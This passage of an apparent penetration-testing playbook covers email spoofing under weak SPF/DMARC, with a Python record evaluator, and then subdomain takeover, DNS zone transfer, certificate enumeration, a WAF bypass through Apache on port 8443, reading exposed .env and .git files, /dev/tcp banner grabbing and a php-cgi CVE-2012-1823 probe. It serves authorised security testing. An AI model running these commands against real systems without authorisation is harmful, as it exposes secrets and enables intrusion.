&lt;li&gt;Spoofing therefore does not need SES at all: send &lt;code&gt;From: president@party.org.br&lt;/code&gt; from any mail server&lt;/li&gt;
&lt;li&gt;SPF returns SoftFail (&lt;code&gt;~all&lt;/code&gt;), which receivers treat as accept-and-tag&lt;/li&gt;
&lt;li&gt;DKIM: sign with your own domain or not at all; either way no signature is aligned with &lt;code&gt;party.org.br&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;DMARC fails, but &lt;code&gt;p=none&lt;/code&gt; asks receivers to take no action → the message is delivered, at most scored as spam by the receiver&amp;rsquo;s own filters&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The fix follows the chain in reverse: &lt;code&gt;-all&lt;/code&gt; listing only the domain&amp;rsquo;s real senders, DKIM on every sending service, then &lt;code&gt;p=quarantine&lt;/code&gt; and finally &lt;code&gt;p=reject&lt;/code&gt;.&lt;/p&gt;
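&lt;p&gt;To turn the records from 23.1 into the verdicts in the 23.2 table, and to see why the chain in 23.3 ends in delivery, here is an added Python evaluator (example code, not from the playbook). It parses an SPF record for its &lt;code&gt;all&lt;/code&gt; qualifier, &lt;code&gt;include:&lt;/code&gt; terms and DNS-lookup count (RFC 7208 caps lookups at 10; beyond that receivers return permerror and the record is useless), parses a DMARC record for &lt;code&gt;p&lt;/code&gt;, &lt;code&gt;sp&lt;/code&gt;, &lt;code&gt;pct&lt;/code&gt; and &lt;code&gt;rua&lt;/code&gt;, and applies the DMARC rule that a message passes only if SPF or DKIM passes and is aligned with the &lt;code&gt;From:&lt;/code&gt; domain. The sample records are constructed; &lt;code&gt;sendgrid.net&lt;/code&gt; is listed beside &lt;code&gt;amazonses.com&lt;/code&gt; as another shared-platform include and is an addition here, as is the choice of finding texts.&lt;/p&gt;

```python
import operator
import re

# Mechanisms and modifiers that cost a DNS lookup (RFC 7208 s.4.6.4): more than 10 is a
# permerror and receivers then behave as if the domain published no SPF at all.
_LOOKUP_TERM = re.compile(r"^(?:include:|redirect=|exists:|a(?:[:/]|$)|mx(?:[:/]|$)|ptr(?::|$))")

# include: targets that authorise a shared platform's whole egress range, not one tenant.
# amazonses.com is the playbook's case; sendgrid.net is an analogous example added here.
SHARED_INCLUDES = {"amazonses.com", "sendgrid.net"}


def parse_spf(record):
    """Return (all_qualifier, includes, lookup_count) for a v=spf1 TXT record.
    Nested includes are not resolved here, so lookup_count is a lower bound."""
    terms = record.strip().split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    all_qualifier, includes, lookups = None, [], 0
    for term in terms[1:]:
        t = term.lower()
        qualifier = "+"                       # the implicit qualifier is Pass
        if t[0] in "+-~?":
            qualifier, t = t[0], t[1:]
        if t == "all":
            all_qualifier = qualifier
            break                             # nothing after 'all' is evaluated
        if t.startswith("include:"):
            includes.append(t[len("include:"):])
        if _LOOKUP_TERM.match(t):
            lookups += 1
    return all_qualifier, includes, lookups


def spf_findings(record):
    """Weaknesses of an SPF record, worded the way a report would list them."""
    all_qualifier, includes, lookups = parse_spf(record)
    findings = []
    if all_qualifier is None:
        findings.append("no 'all' term: unlisted hosts get Neutral, the same as ?all")
    elif all_qualifier == "+":
        findings.append("+all: every host on the internet passes SPF")
    elif all_qualifier == "?":
        findings.append("?all: Neutral for everyone, SPF carries no signal")
    elif all_qualifier == "~":
        findings.append("~all: softfail only, receivers accept and at most tag the message")
    if operator.gt(lookups, 10):              # lookups exceed the RFC limit
        findings.append(f"{lookups} DNS lookups exceed the limit of 10: permerror, SPF is effectively off")
    for inc in includes:
        if inc in SHARED_INCLUDES:
            findings.append(f"include:{inc} authorises every tenant of a shared platform, not just this domain's account")
    return findings


def parse_dmarc(record):
    """Split 'v=DMARC1; p=none; rua=...' into a tag dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def dmarc_findings(record):
    tags = parse_dmarc(record)
    policy = tags.get("p", "none").lower()
    sub_policy = tags.get("sp", policy).lower()   # subdomains inherit p unless sp= overrides it
    pct = int(tags.get("pct", "100"))
    findings = []
    if policy == "none":
        findings.append("p=none: monitoring only, mail that fails DMARC is still delivered")
    if sub_policy == "none" and policy != "none":
        findings.append("sp=none: subdomains are unprotected although the apex enforces")
    if operator.lt(pct, 100):                     # policy sampled, not applied to all mail
        findings.append(f"pct={pct}: the policy is applied to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua= tag: nobody receives aggregate reports")
    return findings


def dmarc_verdict(spf_result, spf_aligned, dkim_result, dkim_aligned, policy):
    """RFC 7489 evaluation: pass needs an aligned SPF pass or an aligned DKIM pass.
    A DKIM signature from the attacker's own domain passes DKIM but is not aligned."""
    if (spf_result == "pass" and spf_aligned) or (dkim_result == "pass" and dkim_aligned):
        return "pass"
    return {"none": "deliver", "quarantine": "quarantine", "reject": "reject"}[policy]


if __name__ == "__main__":
    # constructed records mirroring the political-party case
    for line in spf_findings("v=spf1 include:_spf.google.com include:amazonses.com ~all"):
        print("SPF  :", line)
    for line in dmarc_findings("v=DMARC1; p=none; rua=mailto:dmarc@party.org.br"):
        print("DMARC:", line)
    # forged From: sent from any server: SPF softfail, attacker's own DKIM (unaligned), p=none
    print("verdict:", dmarc_verdict("softfail", False, "pass", False, "none"))
```

&lt;p&gt;Feed it the &lt;code&gt;dig +short TXT&lt;/code&gt; output from 23.1 (strip the surrounding quotes first). The last line of the demo is step 6 of 23.3 in code: with &lt;code&gt;p=none&lt;/code&gt; the verdict is &lt;code&gt;deliver&lt;/code&gt;; change the policy to &lt;code&gt;reject&lt;/code&gt; and the same message is refused.&lt;/p&gt;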
&lt;hr&gt;
&lt;h2 id="24-subdomain-takeover--dns" &gt;
&lt;div&gt;
&lt;a href="#24-subdomain-takeover--dns"&gt;
#
&lt;/a&gt;
24. SUBDOMAIN TAKEOVER &amp;amp; DNS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="241-subdomain-takeover-candidates" &gt;
&lt;div&gt;
&lt;a href="#241-subdomain-takeover-candidates"&gt;
##
&lt;/a&gt;
24.1 Subdomain Takeover Candidates
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Identify CNAMEs pointing to services that allow reclamation:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Vercel: cname.vercel-dns.com → check if project was deleted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# AWS S3: bucket.s3.amazonaws.com → check if bucket doesn&amp;#39;t exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# GitHub Pages: usuario.github.io → check if repo was deleted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Azure: cloudapp.azure.com → check if resource was removed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Zendesk: zendesk.com → check if helpdesk was removed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Shopify: myshopify.com → check if store was removed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Heroku: herokuapp.com → check if app was deleted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Error fingerprint indicates potential takeover:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;NoSuchBucket&amp;#34; (S3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;There isn&amp;#39;t a GitHub Pages site here&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;404 — There isn&amp;#39;t a page at this address&amp;#34; (Vercel)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;Domain is not configured&amp;#34; (Azure)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="242-dns-zone-transfer" &gt;
&lt;div&gt;
&lt;a href="#242-dns-zone-transfer"&gt;
##
&lt;/a&gt;
24.2 DNS Zone Transfer
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Try zone transfer (rare, but devastating if it works)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; ns in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;host -t ns &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt; -f4&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;=== &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ns&lt;/span&gt;&lt;span style="color:#a6d189"&gt; ===&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dig axfr @&lt;span style="color:#f2d5cf"&gt;$ns&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="243-tls-certificates--more-subdomains" &gt;
&lt;div&gt;
&lt;a href="#243-tls-certificates--more-subdomains"&gt;
##
&lt;/a&gt;
24.3 TLS Certificates — More Subdomains
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# crt.sh (free, no rate limit)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://crt.sh/?q=%25.&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;amp;output=json&amp;#34;&lt;/span&gt; | jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[].name_value&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SecurityTrails (requires API key)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DNSDB (requires account)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Censys (requires account)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="25-advanced-field-techniques" &gt;
&lt;div&gt;
&lt;a href="#25-advanced-field-techniques"&gt;
#
&lt;/a&gt;
25. ADVANCED FIELD TECHNIQUES
&lt;/div&gt;
&lt;/h2&gt;
&lt;p&gt;These techniques were discovered and validated in real pentests against 100+ targets.&lt;/p&gt;
&lt;h3 id="251-apache-port-8443--nginxwaf-bypass" &gt;
&lt;div&gt;
&lt;a href="#251-apache-port-8443--nginxwaf-bypass"&gt;
##
&lt;/a&gt;
25.1 Apache Port 8443 — nginx/WAF Bypass
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When nginx terminates port 443 as a reverse proxy (WAF rules, &lt;code&gt;location&lt;/code&gt; deny blocks, rate limits) and the Apache backend behind it also listens on port 8443, a request to 8443 skips every nginx control. The backend is usually configured for trusted proxy traffic only, so it tends to be far more permissive.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Detect Apache on 8443&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;server:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Server: Apache/2.4.29 (Ubuntu)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Check if TRACE is enabled (XST — Cross-Site Tracing)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X TRACE &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/&amp;#34;&lt;/span&gt; -D -
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP/1.1 200 OK — echoes ALL headers including cookies!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Access the framework entry point directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/public/index.php&amp;#34;&lt;/span&gt; -D - | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;set-cookie&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Sets XSRF-TOKEN and session cookies → confirms PHP/FastCGI processing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Check catch-all vhost (accepts any Host header)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -H &lt;span style="color:#a6d189"&gt;&amp;#34;Host: naoexiste9999.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/&amp;#34;&lt;/span&gt; -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 200 → catch-all vhost — serves content for any domain&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Test sensitive files that nginx blocks but Apache serves&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/.env&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/storage/logs/laravel.log&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/icons/README&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Apache default&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Fitness tech company — Apache 2.4.29 on port 8443 with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;TRACE enabled (echoed HttpOnly cookies)&lt;/li&gt;
&lt;li&gt;Catch-all vhost (any Host header = 200)&lt;/li&gt;
&lt;li&gt;Direct access to Laravel &lt;code&gt;public/index.php&lt;/code&gt; (set session cookies)&lt;/li&gt;
&lt;li&gt;nginx on port 443 blocked everything — Apache 8443 served everything&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="252-git-exposure--beyond-gitconfig" &gt;
&lt;div&gt;
&lt;a href="#252-git-exposure--beyond-gitconfig"&gt;
##
&lt;/a&gt;
25.2 Git Exposure — Beyond &lt;code&gt;.git/config&lt;/code&gt;
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/HEAD reveals current branch&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/HEAD&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/packed-refs reveals ALL branches (including inactive ones)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/packed-refs&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/logs/HEAD reveals committer email&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/logs/HEAD&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;[^&amp;gt;]+&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/index (233KB+) — lists ALL tracked files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/index&amp;#34;&lt;/span&gt; | strings | grep -E &lt;span style="color:#a6d189"&gt;&amp;#39;\.php$|\.env$|\.yml$|\.json$&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract files from .git with git-dumper&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://github.com/arthaud/git-dumper&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./git_dumper.py http://TARGET/.git/ /tmp/repo/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="253-mysql--ftp-banner-with-pure-bash-no-nmap" &gt;
&lt;div&gt;
&lt;a href="#253-mysql--ftp-banner-with-pure-bash-no-nmap"&gt;
##
&lt;/a&gt;
25.3 MySQL / FTP Banner with Pure Bash (no nmap)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# MySQL — banner without mysql client&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/3306; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Output: 5.7.42-0ubuntu0.18.04.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# FTP — banner without ftp client&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/21; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Output: 220 (vsFTPd 3.0.3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SMTP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/25; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SSH&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#39;exec 3&amp;lt;&amp;gt;/dev/tcp/TARGET_IP/22; head -1 &amp;lt;&amp;amp;3&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Output: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Works for ANY TCP service — no dependencies&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="254-php-cgi-query-string-fingerprinting" &gt;
&lt;div&gt;
&lt;a href="#254-php-cgi-query-string-fingerprinting"&gt;
##
&lt;/a&gt;
25.4 PHP CGI Query String Fingerprinting
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;PHP&amp;rsquo;s easter-egg query strings are gated on &lt;code&gt;expose_php=On&lt;/code&gt;, not on the SAPI: the credits page works under mod_php, PHP-FPM and CGI alike, while the logo GUIDs were removed in PHP 5.5. With &lt;code&gt;expose_php=On&lt;/code&gt; the &lt;code&gt;X-Powered-By&lt;/code&gt; header also gives the exact version. Whether PHP really runs as &lt;code&gt;php-cgi&lt;/code&gt; (the precondition for CGI argument injection) has to be confirmed separately:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# PHP credits page (needs expose_php=On; any SAPI; the X-Powered-By header carries the version)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skD - &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# PHP logo: a built-in image, unrelated to GD; PHP 5.4 and older only, so a hit also dates the install&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Returns GIF 120x67&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# php-cgi check: CVE-2012-1823 (argument injection, php-cgi before 5.3.12 / 5.4.2; CVE-2024-4577 is the 2024 variant on Windows). ?-s prints the script source when vulnerable&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/index.php?-s&amp;#34;&lt;/span&gt;
